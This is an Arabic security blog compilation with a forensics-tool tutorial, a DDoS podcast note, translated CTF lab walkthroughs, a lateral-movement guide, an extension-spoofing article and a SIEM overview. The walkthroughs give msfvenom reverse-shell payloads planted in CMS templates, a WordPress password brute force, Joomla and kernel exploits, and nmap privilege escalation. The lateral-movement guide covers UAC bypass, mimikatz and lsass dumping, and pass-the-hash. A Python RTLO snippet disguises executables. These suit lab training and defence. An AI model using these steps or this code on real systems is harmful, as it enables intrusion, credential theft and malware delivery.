سوف نستعرض في هذا المقال Belkasoft Evidence Center  من انتاج شركة belkasoft .  سوف نتعلم كيفية استخدامه لعمليات التحقيق الجنائي   وسوف نركز على كيفية استخدامه لتحليل صوره النظام من نوع RAW Images . اابرنامج يعتبر من البرامج التي تقوم بعملية التحليل بشكل تلقائي ثم تقوم بتوليد تقرير كامل عن التحليل . مثل هذه الادوات يحفظ الكثير من الوقت .

يستحسن ان تطلع مقال نظرة على التحليل الجنائي الرقمي Digital Forensics .

أولاً ،  قم بتحميل مركز أدلة  belkasoft النهائي  من هذا الرابط.

انقر على خيار جديد لتحديد الصورة الخام (RAW Images )

أدخل اسم القضية

حدد المجلد الأساسي  الذي سوف يتم حفظ الادلة فيه , ثم اكتب اسم المحقق ووصف الحالة. وانقر فوق موافق

الآن قم بتحديد الصورة الخام وتحقق من خيار تحليل مصدر البيانات. وانقر على التالي

الآن اختر من أنواع البيانات المعتمدة وانقر على التالي

الآن حدد الجميع وانقر على إنهاء.

لتصور المواقع المخبأة تماما كما يشاهدها المستخدم، انقر على ذاكرة التخزين المؤقت “Cache”   في خيار المتصفحات “Browsers”

لمشاهدة قائمة الملفات التي تم تنزيلها، انقر على الملفات المحملة

للتحقق من قائمة المواقع التي تمت زيارتها من قبل المستخدم، اختر خيار sites

لرؤية قائمة cookie، انقر على خيار cookies  .

الآن انقر على خيار Documents  عن وثم اختار   Found  Documents  لرؤية كافة ملفات وثائق المكتب  الموجودة  في جهاز الكمبيوتر الخاص بالمستخدم .

لمشاهدة كافة الملفات المشفرة، انقر على خيار Found Encrypted files   .وسيتم الكشف عن أكثر من 150من أنواع الملفات المشفرة. ومن الممكن أيضا  فك تشفير كل هذه الملفات  مع  هذا المنتج بتثبيت اضافة passware kit Forensic .

للعثور على صور القائمة، اختر Found pictures  في  خيار pictures. وللكشف عن التزوير في الصورة. انقر بالزر الأيمن  على الصورة، واختر Analyze  pictures  ثم انقر على تبويب كشف التزوير “Detect Forgery ”

للعثور على آخر الملفات التي تم فتحها خلال برنامج  Acrobat Reader ، انقر على خيار Adobe Acrobat Reader Recent

لمعرفة آخر التطبيقات التي يديرها المستخدم، انقر على آخر التطبيقات والمسارات في خيار NTUSER.DAT . NTUSER.DAT    هو ملف تسجيلي في نظام التشغيل ويندوز . يحتوي كل ملف تعريف شخصي للمستخدم على ملف NTUSER.DAT . والذي يحتوي على مجلد  وثائق  فريداً  من نوعه،  وتهيئة قائمة البدء، وخصائص سطح المكتب بالإضافة إلى  محفوظات التصفح.

لمعرفة آخر الملفات المحددة من قبل المستخدم، انقر على آخر الملفات المحددة.

للتحقق من آخر الملفات التي قام بفتحها المستخدم، انقر على خيار آخر الملفات

للكشف عن أحدث عمليات البحث من قبل المستخدم، انقر فوق خيار searches .

للعثور على أحدث الملفات  التي تم الوصول إليها من قبل المستخدم، انقر على Recently accessed documents.

هذه كانت لمحه عن الاداة ومميزاتها القويه .

اطلع على ادوات اخرى مفيد في التحقيق الجنائي الرقمي في مقال  افضل عشر ادوات مجانية في التحقيق الجنائي الرقمي .

المصدر : http://www.hackingarticles.in/forensics-investigon-of-raw-images-using-belkasoft-evidence-center

حلقة جديدة من iSecur1ty Podcast قُمنا بالتحدث فيها انا ومحمد عسكر عن الهجوم الذي تسبب في تعطيل مجموعة من المواقع الكبيره مثل Twitter, GitHub, PayPal Amazon,soundcloud , Reddit, Netflix, Spotify.

الهجوم كان بتاريخ October 21, 2016 ضد سيرفرات DNS الخاصه بشركه DynDns حيث أشارت التقارير الاولية إلى إستخدام اجهزه IOT في هذا الهجوم والتي وصلت لاكثر من 160 الف جهاز.

حيث ذكرنا مجموعة من الإحصائيات والأرقام في هذا المقال وكذلك تطرقنا لبعض المفاهيم المُهمة والأمور الأخرى حول هذه الهجمة بشكل خاص والمفهوم العام لهجمات حجب الخدمة بشكل عام.

نتمنى أن تكون الحلقة مُفيدة لكم وبإذن الله نلتقي بمزيد من الحلقات والمواضيع المُختلفة ، لن أطيل عليكم وأدعكم للإستماع للحلقة

لمعرفة المزيد عن هجمات الحرمان من الخدمه اطلع على المقال التالي :

مقال : هجمات الحرمان من الخدمه بالتفصيل 

وفي حال كان لديكم أي إستفسارات أو أمور أخرى تُريدون إضافتها ، المرجو كتابتها في التعليقات وسوف نكون سُعداء بالرد عليها.

في هذا المقال سوف نقوم بحل تحدي M.r. Robot  والمبني على المسلسل التلفزيوني  M.r.Robot ، حيث يحتوي التحدي على ثلاثة مفاتيح مخفية في مواقع مختلفة. والهدف الرئيسي هو العثور على الرموز الثلاثة المخبأة في النظام.  صعوبه العثور على كل مفتاح تصعب بشكل تدريجي .  لكن اقتحامه  ليس صعباً  جدا. حيث لا يوجد  أي استغلالات متقدمة أو هندسة عكسية. ويعتبر المستوى beginner-intermediate.

أولا  قم بتحميل M.r.Robot lab  من هنا

أولا علينا العثور على عنوان IP الخاص به وللقيام بذلك اذهب إلى نظام kali الخاصة بك  واكتب:

netdiscover

عند تنفيذ الأمر أعلاه سنجد كافة عناوين IP في شبكتنا. عنوانIP الذي نريده هو 192.168.0.102، دعونا نقوم بفحصه

لفحص  عنوان IP المستهدف سوف نستخدم الخيار  (aggressive scan  (-A في اداة nmap .

nmap -A 192.168.0.102

وتبين  لنا نتيجة الفحص المنافذ المفتوحة  والتي هي: 22، 80، 443. بما ان  منفذ 80 مفتوح يمكننا  محاولة فتح عنونIP في متصفحنا

وكما يتبين، فإنه مفتوح مما يؤكد مواصلة هدفنا

لاحقاً  سوف نفحصه باستخدام اداة nikto عليه . ستساعدنا اداة Nikto على جمع المعلومات مثل الملفات وجميع الاشياء الرئيسية  الآخرى التي ينبغي أن نعرفها عن هدفنا. لذلك، اكتب:

nitko -h 192.168.0.102

من النتيجة يمكن عرفنا أن هناك ملف نصي  باسم  robots.txt الذي يمكن أن يزودنا بمزيد من المعلومات. حتى الآن دعونا نحاول فتح هذا الملف في المتصفح

قمنا بفتح ملف key-1-of-4.txt في المتصفح وبذلك نكون حصلنل على المفتاح الأول من  الثلاثة مفاتيح المذكورة مسبقاً

الآن قم بفتح ملف fsocity.doc  في المتصفح الذي هو ملف القاموس. دعونا نحاول أولا فتح ملف القاموس

وبمجرد فتح ملف القاموس  في المتصفح، فإنه يطلب منا تحميل البرنامج. سنقوم بتحميله وفتحه. ذلك هو الملف الذي قد يحتوي على اسم المستخدم وكلمات السر

وحتى الآن نعلم ان قد يكون لدينا  اسم المستخدم وكلمات السر، وسنحاول الدخول إلى هدفنا. واحدا تلو الآخر قمنا بمحاولة كل اسم مستخدم وظهر خطأ أن اسم المستخدم غير موجود. ولكن عندما استخدمنا  أسم elliot  كان الخطأ  ان كلمة السر  غير صحيحة. elliot اسم بطل المسلسل .

وبذلك نحن على يقين من شيء واحد وهو أن elliot هو اسم مستخدم صحيح لذلك نحن الآن بحاجة فقط الى العثور على كلمة المرور الخاصة به.

أفضل تخمين لدينا للعثور على كلمة المرور هو نفس ملف القاموس الذي وجدنا  فيه اسم المستخدم . وبالتالي،  سوف نستخدم WPScan العثور على كلمة السر لدينا من نفس الملف. لهذا  قم بفتح WPScan  في نظام kali  واكتب :

ruby ./wpscan.rb –url http://192.168.0.102 –wordlist /root/Desktop/fsocity.dic –username elliot

شرح الامر

./wpscan.rb -> يبدأ WPScan

-url -> يدل على URL التي سيعمل عليها  WPScan

http://192.168.0.102 -> هو عنوان الموقع “URL”

-wordlist -> يدل على مسار ملف القاموس

-username -> يدل على اسم المستخدم

elliot -> اسم المستخدم

بمجرد أن يبدأ الأمر بالعمل سيستغرق وقتا للتنفيذ حيث ان ملف القاموس ضخم. لذلك، اجلس  واسترخِ، ودع WPScan يقوم بعمله.

عندما يتم الانتهاء من التنفيذ (والذي قد يحتاج للكثير من الوقت كما في حالتنا استغرق ما يقارب ال 4 ساعات) سيكون لديك كلمة المرور لإسم المستخدم elliot  وهي ER28-0652

باستخدام كلمة المرور، قم بالدخول إلى  الهدف

بمجرد ان قمت بتسجيل الدخول، دع الملفات الخبيثة التي حصلت عليها تتحمل هناك. الان قم بتوليد البايلوود  من خلال أمر

msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

انسخ الرمز من  <?php to die();  والصقه على قالب (واحفظه)

الآن لديك حق الوصول إلى  WordPress  وعمل المشرف هو استبدال أحد مواضيع القوالب  مع بعض PHP الخاصة بك. قررنا محاولة استخدام reverse shell  عن طريق تحرير موضوع 404.php واستبدال المحتويات مع  msfvenom generated shell

في نفس الوقت قم بفتح metasploit وأكتب :

Use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

بمجرد تنفيذ الاستغلال، قم بفتح مسار القالب في المتصفح كما هو مبين:

تصفح لhttp://192.168.0.102/wp-content/themes/twentyfifteen/404.php~~V~~gender=M واضغط دخول

بمجرد فتح مسار القالب  في المتصفح سيكون لديك meterpreter session وبمجرد الحصول عليها، انتقل إلى shell واكتب

بعد القيام بالمذكور أعلاه، سوف تقوم بإدخال  المستخدم للهدف،  ولمعرفة جميع المعلومات حول المستخدم اكتب :

ls -lsa (gives us the information about the user we just entered)

cd home (take us in the folder home)

ls -lsa (gives the information about the home folder0

cd robot (takes us into the robot folder)

الآن، لمعرفة معلومات عن المجلد/ ملف ال Robot  سنكتب:

ls -lsa

نعلم الآن أن هناك ملفان هامان، واحد منهم هو ملف نصي و الآخر هو كلمة السر على شكل MD5. اذا حاولنا فتح الملف النصي عن طريق كتابة:

cat key-2-of-3.txt

سوف يتم  فتحه وكأنك لا تملك الإذن للقيام بذلك. ولكن الآن دعونا نحاول فتح ملف MD5 ولهذا اكتب:

cat password.raw-md5

تنفيذ الأمر المذكور أعلاه سيعطينا قيمة MD5 (قيمة التجزئة) لكلمة السر كما نرى أدناه:

سوف نستخدم md5cracker.org

( online  MD5 value cracker)   لمعرفة على قيمة MD5. أدخل قيمة MD5 في مربع النص وانقر على زر  encrypt/ crack

سوف تترجم القيمة إلى ABCDEFGHIJKLMNOPQRSTUVWXYZ كما هو مبين أدناه

الآن حاول تبديل المستخدم في المحطة  إلى  Robot بواسطة الأمر:

su robot

بتتبع الأمر سوف يطلب منك إدخال كلمة المرور. أدخل كلمة المرور MD5 cracked  هنا، وسوف تدخل مستخدم الrobot,  للحصول على المعلومات اكتب:

ls -lsa

الآن، حاول  فتح الملف النصي المتبقي بكتابة:

   cat key-2-of-3.txt

هنا سنقرأ  ملف المفتاح الثاني

تالياً اكتب ما يلي:

nmap

Nmap يدعم خيارا يسمى “التفاعلية.” مع هذا الخيار،  يكون المستخدمين  قادرين على تنفيذ shell commands  باستخدام nmap .

nmap –interactive

مع الأوامر أعلاه سوف تدخل Nmap ثم اكتب:

!sh

Id (لمعرفة المستخدمين)

cd /root ( يتيح لك إدخال root)

وبمجرد الانتهاء من ادخال ال root، اكتب:

ls -lsa

ثم

cat key-3-of-3.txt

وبعد التنفيذ نحصل على 3 من 3 مفاتيح، ومن ثم الدخول الى M.r.Robot . وهناك العديد من الطرق لأداء  ما ذكر أعلاه ولكن هذا الأساليب هو أسهلها. نأمل أن وجدتها فعالة ومثيرة  للاهتمام وتساعدك على التعلم .

ترجمة لمقال : (Hack the Mr. Robot VM (CTF Challenge

Simple CTF  تحدي من تحديات boot2root والتي تركز على اساسيات اختبار اختراق تطبيقات الويب. بمجرد تحميل VM قم بالتعامل معه كسيرفر ويب يمكن رؤيتها على الشبكة في حاله لا يمكنك الوصول اليه مباشرة .

الخدع مثل التعديل على إعدادات البيوس لل VM او اعدادات الـGrub ليس مسموح بها على الأطلاق. المسموح به فقط هو الهجوم عن بعد. وهدفك هو المسار root/flag.txt/ . وبالتالي tفي هذه المقالة سوف نمر على جميع الطرق لتحقيق هذا الهدف.

أولا قم بتحميل simple VM من هنا

سوف نبدا تحديد هدفنا بإستخدام الامر التالي :

netdiscover

هدفنا هو 192.168.0.104

ثم انتقل لمسح الهدف باستخدام nmap مع الامر التالي:

nmap -A -p 192.168.0.104

خلال المسح سوف تجد بأن البورت 80 مفتوح. فلنفتحه عبر متصفحنا

والأن يمكننا رؤية ان هدفنا يستخدم CuteNews v.2.0.3 والأخبار الجيدة هي بأنه قابل للإستغلال, لنبحث عن إستغلاله:

searchspolit cutenews 2.0.3

من خلال البحث عن الإستغلال يمكننا معرفة باننا نملك الان المسار من اجل الإستغلال. بإتباع المسار والذهاب الى ملف txt. المستغل. سوف تجد ضمن الملف النصي التعليمات بكيفية رفع الملف. اول شئ يخبرنا بكيفية التسجيل على الموقع للتمكن من رفع الملف. وللتسجيل سيطلب منك إعطاءه اسم المستخدم وكلمة المرور. عند اكمال خطوات التسجيل, سوف يتم توجيهك الى هذه النافذة:

الأن نحتاج الى رفع الملف وقم بذلك بمساعدة msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

قم بنسخ الكود من php?> الى ()die واحفظه في ملف له لاحقة .php . ولرفع الملف قم بتسجيل الدخول بإستخدام اسم المستخدم الذي قم بالتسجيل فيه ثم انقر على personal options وقم بإدخال اسم المستخدم وعنوان البريد الإلكتروني ,ومن ثم اختر الملف الذي تريد رفعه وانقر على save.

الأن سوف نستخدم dirb لإيجاد المسارات. من أجل ذلك قم بكتابة:

dirb http://192.168.0.104

سوف يظهر لك مسار الرفع. هذه هو المسار الذي سوف يرفع اليه ملفك. افتح المسار في المتصفح وسوف تجد ملفك هناك.

الأن اذهب الى metaspolit واكتب :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

بتنفيذ الإستغلال الموضح بالأعلى سوف نمتلك جلسة meterpreter , اكتب أيضا:

shell

واذا قمت بكتابة المزيج من الأمرين التاليين لإيستيراد ملف البايثون للوصول الى terminal فعندها لن تعمل بسبب نسخة البايثونالمحدثة :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

الأن سوف تصل لل terminal. هنا, قم بكتابة الأمر التالي لمعرفة نسخة kernal:

lsb release -a

وحسب مانعرف بأن تلك النسخة من kernal قابلة للإستغلال وغير محصنة, بناء على ذلك سوف نقوم بتحميل إستغلاله بالأمر التالي:

wget https//www.exploit-db.com/download/36746

هذا سوف يقوم بتنصيب الإستغلال بنجاح. وبالتقدم للإمام سوف نقوم ب compile الملف:

gcc 36746.c -o access -static

سوف نقوم الأن بفتح ملف الوصول

./access

ومن ثم كتابة id لمعرفة المستخدمين ومن ثم اكتب :

cd /root

وسوف يأخذك لمسار الرووت. قم بكتابة:

ls

وسوف يقوم بعرض قائمة من الملفات ومنهم سيكون ملف flag.txt. ولقراءة الملف من نوع flag نكتب:

cat flag.txt

ترجمة مقال : (Hack the Simple VM (CTF Challenge لصاحبها RAJ CHANDEL

في هذا الفيديو قمت بشرح كيفية انشاء  portable incident response toolkit بحيث يتم استخدامها اثناء التحقيق على الاجهزه والسيرفرات , هذه الــ toolkit عباره عن فلاش USB قمنا بتجهيزه بجميع الادوات التي قد يستخدمها اي محقق جنائي .

كذلك حاولنا بقدر الامكان الحفاظ على الجهاز الدليل وعدم تشغيل اي من ملفات الدليل عن طريق تغيير قيمه المتغير PATH في انظمه لينكس الى مسار اخر بداخل الفلاش ديسك والذي يحتوي على كل الادوات .

الكثير من الهجمات التي من الممكن تنفيذها على الشبكات والانظمه قد لا تكون سببها ثغرات فقط ,  الاعدادات الخاطئه او الغير جيده للشبكه والاجهزة تتسبب في العديد من المشاكل التقنيه والامنيه .

في هذا المقال سوف ناخذ مثال على Misconfiguration attacks وهو ببساطه عباره عن مهاجمه اجهزه لم يقم مدير الشبكه باعدادها جيدا لتراعي الجوانب الامنيه .

في هذا السيناريو سوف نفترض بأن هناك مدير شبكه قام باعداد الشبكه ولم يقوم بوضع كلمه سر مختلفه لكل جهاز على الشبكه قد  تكون شبكه موظفين في شركه او جامعه او كافي نت . احيانا تكون هذا الاخطاء بسبب قلة وعي مدير الشبكه او بسبب الكسل والاهمال بوضع باسورد مختلف لكل جهاز , احيانا ايضا الكلفه فبعض الشبكات الصغيره والتي قد لا تكون في بيئة الدومين او لا تتواحد منتجات تقوم بعمل centralization  وتحكم كامل بالشبكه .

في البداية سوف نحاول ايجاد كلمه السر الخاصه بالجهاز الذي استطعنا الوصول اليه واختراقه او الجهاز الذي نستخدمه في حاله كان لنا وصول للشبكه . سوف نستخدم الاداه الشهيره mimikatz في هذا الحالة

لتحميل الأداه من هنا

https://github.com/gentilkiwi/mimikatz/releases

ولكن هناك مشكله وهي تتمثل في  User Account Control) UAC)

الـUAC هو المسئول عن مراقبه صلاحيات المستخدمين علي أنظمه الويندوز والمشكله هنا هي أنه لكي نستطيع أستخدام أداه mimikatz يجب أن نقوم بتشغيلها بصلاحيات مسئول

ولذلك يجب أن نقوم بعمل تخطي لصلاحيات المستخدم ولعمل هذا هناك الكثير من الخدع لكن هناك أداه شهيره بها 23 طريقه لعمل تخطي لصلاحيات المستخدم لمختلف أصدارات الويندوز وهي أداه UACMe

لتحميلها قم بزياره الرابط الأتي وأختار النسخه المناسبه لجهازك

https://github.com/hfiref0x/UACME/tree/master/Compiled

وأختار الطريقه المناسبه من هنا

https://github.com/hfiref0x/UACME/blob/master/README.md#usage

أنا فضلت أختيار الطريقه 3 لأنها كما هو مكتوب تعمل بدايه من ويندوز 7 حتي 10 ولأستخدام الأداه تقوم بالأمر الأتي بعد تنزيلها

Akagi64.exe 3

لاحظ أنني أستخدمت Akagi64.exe بدلا عن Akagi32.exe وذلك لأن جهازي 64 بت

كما تلاحظ فالأن أمامنا الـcmd بصلاحيات مسئول

والأن الخطوه التاليه نفتح أداه mimikatz بصلاحيات مسئول ونقوم بكتابه الأوامر الأتيه بها

privilege::debug
token::whoami
token::elevate
lsadump::sam

والأن كما تلاحظ فقد حصلنا علي كلمه سر المستخدم لكنها في صوره هاش ولكن ليست مشكله فنحن سنقوم بهجوم Pass-The-Hash للدخول علي الأجهزه الأخري وبالتالي لن نحتاج الي كلمه السر الأصليه

ولكن أذا أردت كلمه السر الأصليه يمكنك تطبيق طريقه أخرى من طرق الأداه لتجاوز صلاحيات المستخدم أو نستخدم طريقه أخرى لجلب كلمات السر وهي بمساعده أداه procdump , نقوم  اولا بعمل dump لبروسيس lsass.exe والذي ستجده دائما يحتوي علي كلمات السر في صوره نصيه وتكون الطريقه كالأتي

بعد تنزيل procdump من الرابط :

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

تقوم بتنفيذ الأمر الأتي

procdump64.exe -accepteula -ma lsass.exe MyDump.dmp

وبعدها نفتح أداه mimikatz ونقوم بكتابه الأوامر الأتيه لنستخرج كلمات السر من ملف MyDump.dmp

sekurlsa::minidump MyDump.dmp
sekurlsa::logonPasswords

والأن أنتهي من جلب كلمه السر فيقوم الأن بالدخول علي الأجهزه الأخري عن طريق أداه psexec ولتحميلها أدخل علي الرابط التالي

https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx

وسوف نقوم باختيار الجهاز المراد من ناتج أمر Net View ايضا يمكنك معرفه اسم الجهاز عن طريق اداة nmap

استخدام الامر

netdiscover -r 192.168.1.0

الأن نستخدم الأداه من الأمر الأتي

psexec \\hostname -u Administrator -p {Password_Hash} cmd.exe

والأن استطعنا الوصول الى الجهاز الهدف و وتستطيع أستبدال cmd.exe بأي بروسيس أخر تريد تشغيله

أيضا يمكننا اذا حالفنا الحظ بالدخول علي الروتر الخاص بالشبكه  من خلال خدمه التيلنيت باستخدام كلمه السر الافتراضيه , يمكنك ايضا فحص الشبكه بالكامل والبحث عن اي جهاز ترك باعداداته الافتراضيه ومحاولة استغلاله .

ملاحظه : هذا النوع من الهجمات منتشر جدا في العديد من الشبكات خاصة العامه منها مثل الفنادق والمقاهي وشبكات الجامعات .

لقد أصبح الأن من المعروف أن أي برمجيه خبيثه تكون مبرمجه وبحوزتها بعض خدع الهندسه الأجتماعيه ومن هذه الخدع ماهو مختار خصيصا لأخفاء وتمويه ملفات هذه البرمجيه

البرمجيات الخبيثه غالبا ما توجد بأيقونه ملف عادي  مثل الملفات النصيه في محاوله من مبرمجها لخداع المستخدم مع أستخدام أكثر من صيغه مثل “pdf.exe.” أو “doc.exe.” وذلك ليستغل ميزه أن أنظمه الويندوز بشكل أفتراضي تقوم بأخفاء صيغ الملفات وبهذا قد لا يلاحظ المستخدم حقيقه الملف الذي يقوم بفتحه.!

ويقومون أيضا بأستخدام الصيغ الغير معروف أنها قد تكون ملف ضار مثل “scr.”

ولكن هذه الخدع البسيطه ليست كل شئ فسوف أريكم في هذه المقاله طريقتين من الطرق المشهوره التي يقوم بها بعض الهاكرز.

PIF Extension

هذه خدعه من الخدع الماكره لأنها تقوم بأخفاء صيغه الملف حتي لو أن المستخدم مفعل ميزه أظهار صيغ الملفات

هذا هو كيف يكون شكل ملف تنفيذي بعد تغيير صيغته لـpif فكما تلاحظ ليس فقط صيغه الملف مختفيه ولكن أيقونته أيضا ! فا أسم الملف الذي تراه أمامك الأن هو “file.txt.pif”

RTLO – Right To Left Override

خدعه “من اليمين لليسار” هي من الخدع المشهوره أيضا فكما نعلم جميعا أن معظم اللغات تكتب من اليسار لليمين ومن اليمين لليسار ولخلق التوافق بين هذه اللغات صنع رمز Unicode من أجل أن يحول أتجاه الكلام بشكل ألي.

ولكن الهاكرز قاموا بأستخدامها بطريقه شريره وهي تغيير أتجاه الكلام وبالتالي تغيير الصيغه الظاهره للمستخدم وهذا الرمز هو U+202e

وسأقوم بأستخدام هذا الموقع لكي أقوم بأثبات كلامي وتوضيح الفكره أكثر : https://www.branah.com/unicode-converter

الأن سأغير صيغه ملف من scr لأزورها لـtxt لكي تظهر كا صيغه ملف نصي عادي

الخطوه الأولي : أختر أسم للملف بصيغته ولتكن SCR

الخطوه الثانيه : قم بأضافه كود تغيير الأتجاه كما في الصوره

الخطوه الثالثه : قم بأضافه الصيغه المراد تزويرها وليكن كا مثال “TXT”

الخطوه الرابعه : قم بنسخ الأسم ولصقه علي ملف بصيغه SCR وشاهد النتيجه

والأن لو قمنا بتغيير أيقونه الملف لأيقونه ملف نصي فسيبدو تماما كما لو كان ملف نصي ولا تستطيع أثبات عكس ذلك ألا من معلومات الملف

وحتي لو حاولت أن تقوم بأعاده تسميته فستجد الأسم محدد كالأتي :

والأن كيف نقوم بهذا بلغه البايثون ؟

لقد جهزت كود بسيط بلغه البايثون يستغل الطريقه الثانيه في تزوير الصيغ ولا يحتاج الي شرح

def Spoof_extension(from_file,to_file):
      name = from_file.split(".")[0]
      ex =from_file.split(".")[1]
      new = name+u"\u202E"+to_file.split(".")[-1]+"."+ex
      try:
            os.rename(from_file, new)
            if os.path.isfile(new):
                  print "\n\tFile extension spoof complate !"
      except Exception as e:
            print "\nUnexpected error : %s" % e

سنه 2014

سنه 2014 تم أكتشاف ثغره في برنامج الـWinrar تتيح للمهاجم بتزوير أسماء الملفات الموجوده بالملفات المضغوطه عن طريق تعديل قيم الهيكس الخاصه بالملف المضغوط فلو قمت مثلا بضغط أداه putty والأن أقوم بفتح الملف المضغوط الخاص بها من خلال برنامج Hex Workshop فتكون الصوره كالأتي :

والأن كما تري أسم الملف فنقوم بتغييره لـPutty.txt كالأتي :

والأن لو كنت منصب الأصدار المصاب فبعد فتح الملف ستجد الأسم قد تغير لكن أذا قمت بتشغيله يعمل !

لاحظ أن ليست صيغه exe هي الوحيده الخطيره

بل هناك ملفات أخري تستطيع أن تنفذ أوامر علي الجهاز مما يجعلها خطيره ومنها :

.bat, .cmd, .com, .lnk, .pif, .scr, .vb, .vbe, .vbs, .wsh

الخلاصه

كما رأينا فأنه يوجد العديد من الطرق لتزوير صيغ الملفات وهذه كانت من أبسطهم فمن الأن لا تدع شكل الملف وصيغته طريقه من طرقك في الأستدلال علي أن الملف غير مؤذي

في هذه المقاله سنقوم بحل تحدي من تحديات أختبار الأختراق الخاص بـroot2boot ومثالنا اليوم هو Kevgir VM.

بدايه قم بتحميل ملف الـVM الخاص بها من هنا

ثم نطبق أمر netdiscover الأن بعد تنصيب ملف الـVM

الهدف هو 192.168.0.104 والأن نقوم بعمل فحص للجهاز عن طريق nmap من خلال الأمر:

nmap -A -p- 192.168.0.104

بعدما ينتهي الفحص ستجد العديد من المنافذ المفتوحه مثل 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 والعديد من المنافذ كما في الصوره السابقه والصوره التاليه :

ولكن أذا قمت بالتدقيق في المنافذ المفتوح ستجد أن خدمه الـhttp مفتوحه علي المنافذ 80,8080 و8081 لذلك لنحاول فتح جهاز الهدف علي المنفذ 80 و 8081

بالنسبه للمنفذ 80 ستجد الأتي

أما المنفذ 8081

لوحه التحكم الخاصه بهذا الموقع هي جوملا وهذا الأصدار من جوملا ,كما يعلم الجميع , مصاب بثغره ولذلك سنفحصه بأداه joomscan

joomscan -u http://192.168.0.104:8081

هذه الأداه سترينا كل الثغرات التي في الموقع والأن أذا نظرت الي الأستغلال رقم 15 ستجد أنه يعمل والموقع مصاب

الأن نقوم بالأستغلال كما هو مكتوب بالذهاب أولا الي

192.168.0.104:8081/index.php?optiona=com_user&view=reset&layout=confirm

ثم بكتابه فصله ‘ في صندوق token الذي سيظهر

فستقوم بتوجيهك للصفحه التاليه تطلب منك كلمه السر الجديده

الأن بعد تعيين كلمه سر جديده خاصه بنا نقوم بتسجيل الدخول للموقع بها

الأن بعد أن سجلت دخول أذهب الي القائمه Extensions وأختار منها Template Manager

الأن نقوم بعمل الكود الخبيث الذي سنستخدمه عبر أداه msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

قم بنسخ الكود من <?php حتي die(); واذهب الي template manager وأختار user beez

الأن قم بلصق الكود هنا وعمل حفظ

والأن قم بفتح metasploit وعمل تنصت علي نفس المنفذ بنفس البايلود

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.103
set lport 4444
exploit

وبمجرد أن تقوم بهذا ستفتح عندك جلسه علي الـmetasploit ومبروك أنت أخترقت الجهاز

ترجمة للمقال : Hack the Kevgir VM

نستعرض في هذا المقال واحد من أهم الضوابط الأمنية التقنية للرقابة و كشف الاختراقات و التصدي لها ألا وهو نظام إدارة المعلومات الأمنية (Security Information and Events Management System)، حيث نوضح آلية عملها وأساليب إدارتها بفعالية.

تعتبر الرقابة جزا أساسي و مهم جداً من منظومة الحماية الأمنية و دورة حياتها (Life-cycle)، حيث تمكن الفريق الأمني من كشف الحوادث الأمنية و محاولات الاختراق و التصدي لها، او على الأقل اتخاذ إجراء أمني مناسب في مرحلة مبكرة مما يقلل من أية خسائر مادية أو غير مادية محتملة مقارنة مع تلك الخسائر التي قد تنجم في حال عدم القدرة على كشف الاختراق الأمني في مراحله المبكرة و معالجته.

تعتمد آلية الرقابة الفعالة على جمع المعلومات الأمنية الكافية و المفيدة (Security information and events) من مصادرها المختلفة (Collect) و من ثم تصنيفها (Normalize) و تحليلها (Analyze) و كشف الروابط بينها (Correlate) و عرضها بشكل مناسب و ومفهوم وذا معنى (Display and Reporting) و من ثم التأكد من صحتها وفيما اذا كان هناك حادث أمني قد وقع وأخيراً اتخاذ الإجراء المناسب بما يتناسب مع طبيعة تلك المعلومات  أو الحادث الأمني.

تطرح هذه الآلية تحديات كبيرة للفريق الأمني المعني بالمراقبة حيث يصعب على الأشخاص القيام بهذا التسلسل من العمليات ابتداءاً من جمع المعلومات وصولاً الى تأكيد صحة الحادث الأمني بشكل دقيق دون إغفال أية معلومة (Information) أو حدث (Event) من أي مصدر كان مما يؤثر سلباً على دقة و فعالية آلية المراقبة، خصوصا إذا كانت آلية المراقبة تلك تغطي مؤسسات كبيرة ذات تنوع كبير في الأنظمة و التطبيقات. و كقاعدة عامة، فإنه من المعروف أنك لا تستطيع أن توفر الحماية من شيء لا تدرك حدوثه أصلاً، ولكي تدرك حدوث طارئ ما فيجب عليك المراقبة. كما ترتبط فعالية و كفاءة مستوى الحماية التي توفرها الشركة أو المؤسسة بكفاءة أسلوب الرقابة التي تنتهجه تلك المؤسسة، كلما استطاعت أن تراقب بشكل أفضل كام بإمكانها اكتشاف المخاطر التي تحدق بها بشكل أفضل و بالتالي توفير الاستجابة التي تتناسب مع تلك المخاطر بشكل أسرع و فعال.

ولهذا السبب، قامت الشركات التجارية المعنية بأمن المعلومات بتطوير نوع من التكنولوجيا و الأنظمة الأمنية تقوم بجميع المراحل المذكورة أعلاه و بفعالية هائلة، حيث يمكن لهذه الأنظمة الجديدة بجمع المعلومات و الأحداث الأمنية من عدد هائل من المصادر كقواعد البيانات على تنوعها وأنظمة التشغيل المختلفة و أجهزة البنية التحتية للشبكات و غيرها الكثير ومن ثم تحليلها و كشف الروابط بينها وتقديم تقارير مفصلة عن أية حوادث محتملة. تعرف هذه الأنظمة بـ Security Information and Events Management System أو اختصاراً بـ SIEM. لهذا، وبدلاَ من أي يقوم الفريق المعني بصرف كامل جهده ووقته على جمع المعلومات و تحليلها، فإنه أصبح بإمكانه تكريس ذلك الوقت و الجهد على ما بعد كشف الحادث الأمني ألا وهو التصدي له و تطوير الضوابط الأمنية لمنع تكرار مثل هذه الحوادث في المستقبل.

